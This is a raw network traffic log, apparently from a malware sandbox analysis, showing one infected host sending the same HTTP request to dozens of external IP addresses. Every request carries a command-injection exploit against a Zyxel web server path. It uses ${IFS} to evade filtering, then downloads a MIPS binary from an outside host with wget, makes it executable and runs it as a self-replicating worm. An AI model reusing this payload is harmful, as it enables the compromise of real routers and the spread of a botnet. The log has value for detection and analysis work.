                                            Feb 2, 2024 06:21:10.587042093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3743192.168.2.1553520129.197.103.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587064028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3744192.168.2.1553494168.223.218.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587096930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3745192.168.2.1535868119.7.160.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587131023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3746192.168.2.1557132153.56.91.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587177038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3747192.168.2.154972824.254.152.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587203979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3748192.168.2.1552774141.103.22.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587249041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3749192.168.2.1551466161.31.249.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587297916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3750192.168.2.153670877.6.116.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587323904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3751192.168.2.15384504.234.192.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587373018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3752192.168.2.1536576124.7.115.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587418079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3753192.168.2.154167854.36.130.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587451935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3754192.168.2.155890479.85.219.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587475061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3755192.168.2.1550776100.134.0.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587524891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3756192.168.2.1552574112.243.32.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587559938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3757192.168.2.153663447.252.198.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587593079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3758192.168.2.155175083.142.95.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587625027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3759192.168.2.154940858.78.40.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587668896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3760192.168.2.155219044.166.179.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587692022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3761192.168.2.1532780133.248.220.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587728977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3762192.168.2.1560224166.251.234.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587764025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3763192.168.2.154693447.185.113.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587800980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3764192.168.2.1533510223.5.70.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587850094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3765192.168.2.1558860178.218.8.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587865114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3766192.168.2.156029213.203.91.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587925911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3767192.168.2.155076080.141.16.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587943077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3768192.168.2.155983058.245.166.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587994099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3769192.168.2.155577238.248.176.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588027000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3770192.168.2.1550798157.137.45.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588076115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3771192.168.2.1536790139.69.206.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588109970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3772192.168.2.153598217.88.246.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588150978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3773192.168.2.1544564130.62.49.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588179111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3774192.168.2.1547378198.227.179.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588222027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3775192.168.2.154805020.207.129.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588252068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3776192.168.2.1532836189.146.59.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588274956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3777192.168.2.1541374196.134.191.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588295937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3778192.168.2.1558560159.33.226.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588356972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3779192.168.2.155017061.236.204.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588396072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3780192.168.2.153902698.13.9.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588422060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3781192.168.2.155801487.94.97.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588468075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3782192.168.2.154123274.16.5.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588505030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3783192.168.2.153831257.251.169.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588531971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3784192.168.2.1545268171.21.250.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588570118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3785192.168.2.154605283.208.78.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588598013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3786192.168.2.154269873.21.42.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588658094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3787192.168.2.154658886.84.6.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588679075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3788192.168.2.155681617.88.202.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588718891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3789192.168.2.1556132143.59.156.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588742018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3790192.168.2.1551728167.23.66.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588788033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3791192.168.2.153476450.215.253.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588821888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3792192.168.2.1544100217.216.163.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588845968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3793192.168.2.155778260.174.43.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588872910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3794192.168.2.155672492.41.15.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588910103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3795192.168.2.1558778199.135.88.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588917017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3796192.168.2.1538320211.196.74.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588951111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3797192.168.2.1550720180.9.49.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.588985920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3798192.168.2.155620654.223.35.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589010954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3799192.168.2.1552954187.82.103.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589061022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3800192.168.2.1559144162.231.147.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589092970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3801192.168.2.155990644.238.22.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589123964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3802192.168.2.1534156221.212.151.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589144945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3803192.168.2.1540580159.73.134.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589193106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3804192.168.2.1543606223.113.79.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589222908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3805192.168.2.154254432.180.126.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589252949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3806192.168.2.1553008139.45.85.237443
                                            TimestampBytes transferredDirectionData
